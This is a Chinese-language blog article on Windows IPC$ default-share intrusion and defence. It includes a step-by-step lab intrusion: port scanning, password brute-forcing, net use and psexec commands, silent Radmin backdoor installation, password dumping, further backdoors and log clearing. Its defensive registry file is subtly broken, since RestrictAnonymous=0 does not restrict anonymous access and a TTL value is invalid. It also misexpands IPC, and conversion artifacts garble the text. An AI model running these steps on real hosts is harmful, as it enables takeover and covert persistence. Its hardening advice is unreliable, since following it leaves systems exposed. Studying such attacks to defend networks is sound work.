遠端網絡連接配接（IPC）安全防範研究

遠端網絡連接配接（IPC）安全防範研究

<b>摘要：</b> 本文着重分析了遠端網絡連接配接（IPC）的危害以及利用IPC漏洞實施攻擊的常用方法，并從技術層次和管理層次對如何防範進行了讨論，這對保護區域網路以及整個網絡的安全具有重要的意義。

<b>關鍵詞：</b>網絡安全 遠端網絡連接配接 IPC

一、引言

網絡安全遵循木桶原理，整個網絡環境中網絡安全的水準是由該網絡中防護水準最弱的計算機所決定的。随着網絡技術和硬體技術的快速發展，如今絕大多數機關的計算機在實體上都是連通的，構成了其内部網絡（區域網路）。根據其業務的需求，大多數内部網絡還直接跟網際網路直接相連的。在機關内部網絡中，大部分安全都是建立在基于“信任”的基礎上，而沒有采取安全防範方法，因為大家是同僚，人人都是可以信任的，大家都很“好”，認為沒有誰會進行破壞，沒有誰會擷取情報資訊。

在這種環境下，如果使用者的密碼設定過于簡單，系統預設開放磁盤管理，網絡内部使用者和網絡外部使用者都可以利用目前網絡上的一些簡單黑客軟體通過掃描擷取系統使用者帳号密碼，對網絡内部計算機實施完全控制。如果個人計算機上存在一些機密的檔案等，那麼如果發生入侵，輕者隻是惡作劇，重者會造成檔案洩密等安全事故，其損失是不可估量的。是以遠端網絡連接配接安全是一個不容忽視的安全問題，值得進行探讨。

二、IPC安全

1.什麼是IPC

IPC是Internet Process Connection的縮寫，也就是遠端網絡連接配接。它是Windows NT及Windows 2000特有的一項功能，而ipc$,admin$,c$,d$,e$這些則是Winnt和Win2000的預設共享，特點是在同一時間内，兩個IP之間隻允許建立一個連接配接。

IPC是Windows的一個重要子產品，網路上的芳鄰以及網絡共享都是通過IPC來實作的。黑客或者入侵者利用IPC$共享來實作入侵。網絡上也常常将利用IPC$來實作入侵稱為IPC$漏洞。IPC$就是一種管道通訊，它在兩個ip間建立一個連接配接。如果能夠探測到對方主機開放了139、445端口，說明對方主機開放了共享，也就可以嘗試猜解使用者密碼并進行IPC$連接配接。IPC$連接配接分為IPC$空連接配接和帶有一定權限IPC$連接配接，IPC$空連接配接沒有任何權限，但是可以擷取該主機的netbios資訊；而帶有權限的IPC$連接配接則可以執行指令和對檔案進行複制、删除和修改等操作，從安全的角度來說，IPC$是一個存在安全隐患的因素。

2.IPC$入侵原理

IPC$入侵的最主要原理就是擷取被入侵主機的密碼，利用有權限的IPC$連接配接到主機并複制檔案到主機上，然後運作木馬程式或者執行指令來實作完全控制。如果系統預設共享全部打開，通過字典軟體生成使用者密碼密碼，再利用小榕的SMBCrack等軟體進行使用者登陸密碼的暴力猜解，擷取使用者密碼隻是時間問題。是以網絡遠端連接配接（IPC）安全是網絡安全中一個不容忽視的問題。

三、常見IPC漏洞攻擊方法

1.利用IPC漏洞應具備的條件

（1）知道帳号和密碼，且帳号的權限必須為系統最高權限，本系統中使用是Administator權限。在絕大多數環境中，利用軟體所掃描出來的弱密碼一般都是管理者（Administrator）權限（圖1）。

圖1 密碼探測

（2）系統沒有禁用遠端IPC$連接配接

（3）能夠掃描到對方計算機上所開放的445、135或者139端口

2.試驗

（1）試驗環境

Ø         Windows 2000 Professional+SP4虛拟機

Ø         系統未安裝防毒軟體和防火牆

Ø         目标機IP位址為192.168.1.4

Ø         遠端控制檔案R_server.exe、raddrv.dll、AdmDll.dll。除了Radmin以外還有其他的遠端控制軟體也可以使用。

（2）探測目标機開放端口

Ø         使用sfind工具。使用指令格式為sfind –p 192.168.1.4

Ø         使用NT自動攻擊工具

（3）擷取目标機管理者帳号和密碼

通過NT自動攻擊工具擷取192.168.1.4計算機的管理者帳号是Administrator，密碼是123456。

（4）執行指令

Ø         net use \\192.168.1.4\ipc$ "123456" /user:"Administrator"

Ø         copy *.* \\192.168.1.4\admin$ 其中*.*包含所有的控制檔案。

Ø         psexec \\192.168.1.4 cmd

Ø         通過指令行方式安裝R_Server。直接在psexec中執行以下指令：

netstat -an |find "4899"

regsrc.exe /pass:lovemeloveyou /port:4899 /save  /silence

regsrc.exe /install /silence

net start r_server

執行結果表示Radmin遠端控制軟體服務端安裝成功，然後通過radmin用戶端可以直接對該計算機實施遠端控制。

（5）後續工作

Ø         擷取系統的帳号密碼，使用Adump.exe,Passwddump.exe，mt.exe等軟體擷取系統存在帳号的密碼。

Ø         修改安裝服務名稱

Ø         安裝其它後門程式

Ø         清理日志

說明：現在有很多軟體可以自動實作IPC$漏洞的利用，例如NT/Win2000自動攻擊工具，流光2000等，一旦找到弱密碼，則自動安裝指定的後門程式實施控制。

四、IPC漏洞的安全防範方法

1.管理層次防範方法

在網絡管理中常流行一句話“三分技術，七分管理”。其實在網絡安全中也是“三分技術，七分管理”，安全重在管理。隻有意識上的重視才能帶來長久的安全。

（1）安全審計

據筆者的研究和觀察，在很多機關，仍然有對系統管理者帳号不設定密碼，或者設定成一個很簡單的密碼。例如将密碼設定成生日、年月、常見的單詞等等。密碼的安全是整個網絡安全中的一個重要因素，是以應從審計的角度加強管理，可以對系統是否安裝防毒軟體、防火牆軟體、安裝系統更新檔、系統設定密碼等方面進行安全審計，并配置一個安全管理人員。

（2）安全知識教育訓練

     網絡安全也是一門技術，它由很多知識構成。是以了解和實施需要一個過程，這個過程就是教育訓練和教育。通過教育訓練來提高安全意識和安全技能，通過知識和法律教育來普及計算安全知識和計算機犯罪方面的法律意識和責任，增強安全感和責任感。

2.技術層次防範方法

（1）檢視網絡連接配接情況

使用“netstat –an”檢視本機與網絡的連接配接情況。該指令可以檢視目前所建立的連接配接，系統所開放的服務端口。

（2）檢視IPC$連接配接情況

使用“net use”指令檢視網絡共享連接配接情況，如果顯示結果是“清單是空的”則表示無IPC$連接配接，否則會顯示連接配接的的詳細資訊。

（3）安裝防火牆軟體，如金山防火牆、瑞星防火牆、Norton防火牆、天網防火牆等。防火牆軟體有兩個重要的功能，即隻允許程式通路網絡和過濾端口，防火牆軟體會内置一些安全措施，可以滿足基本的安全需要，但是如果需要定制更進階别的安全，則需要手動更改或者設定防火牆規則。

（4）關閉掉預設共享

關閉預設共享有兩種方式，一種是徹底的禁用共享，一種是開機後删除共享。

開機後删除共享，可以将如下代碼複制到記事本，然後将其另存為delshare.bat檔案，并将其添加到系統的啟動中，這樣系統啟動後就會自動删除預設共享。

net share admin$ /del

net share ipc$ /del

net share c /del

net share d /del

net share e /del

徹底删除共享，可以直接将以下代碼複制到文本檔案，并儲存為delshare.reg檔案，然後自己輕按兩下該檔案将其導入系統資料庫即可。

REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]

"AutoShareServer"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]

"DefaultTTL"= 0-0xff

"AutoshareWks"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]

"Restrictanonymous"=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters]

"SMBDeviceEnabled"=dword:00000000

（5）禁用Schedule服務

直接在“開始”-“運作”中輸入“services.msc”，在服務控制台中停止掉。

五、結束語

網絡安全的建立不是依據“個人情感的信任關系”，而是基于安全政策和管理政策，通過技術來實作安全，通過教育和教育訓練來提供安全意識。本文通過對IPC$入侵方法的分析和研究，提出了技術層次和管理層次的防範。通過以上的分析，可以看出IPC的安全是一個不容忽視的安全問題，是以進行網絡遠端連接配接的安全防範是非常必須的。

參考文獻

1．  網絡掃描與刺探，朱平，新疆電子出版社，2002

2．  黑客防線2005精華奉獻本（上冊），人民郵電出版社，2002

 本文轉自 simeon2005 51CTO部落格，原文連結:http://blog.51cto.com/simeon/46573